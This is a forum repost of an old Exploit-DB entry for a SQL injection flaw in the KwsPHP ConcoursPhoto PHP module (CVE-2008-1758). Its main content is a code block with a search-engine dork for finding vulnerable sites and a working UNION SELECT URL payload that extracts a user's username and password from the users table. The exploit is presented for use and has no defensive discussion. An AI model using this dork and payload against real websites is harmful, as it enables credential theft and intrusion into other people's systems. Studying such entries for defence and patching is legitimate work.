Exploit KwsPHP Module ConcoursPhoto 2.0 - 'C_ID' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5353
Проверка EDB
  1. Пройдено
Автор
STACK
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-1758
Дата публикации
2008-04-03
Код:
#########################################################################
    KwsPHP  Module ConcoursPhoto  Remote SQL Injection Exploit
#########################################################################

## AUTHOR :  Stack-Terrorist [v40]
## Email  :  [email protected]
## Home   :  http://v4-team.com & http://stack-terrorist.com
## Script : KwsPHP  Module ConcoursPhoto
## Bug : Remote SQL Injection Exploit
## Dork : inurl:index.php?mod=ConcoursPhoto

## EXPLOITS :

http://server.com/Path/index.php?mod=ConcoursPhoto&VIEW=prix&C_ID=-1/**/union/**/select/**/concat(pseudo,0x3a,pass)/**/from/**/users/**/where/**/id=1/*

## GREETZ  : All muslims Hackers
## speacial thnx to : str0ke

#########################################################################
                        Stack-Terrorist [v40]
#########################################################################

# milw0rm.com [2008-04-03]
 
Источник
www.exploit-db.com

Похожие темы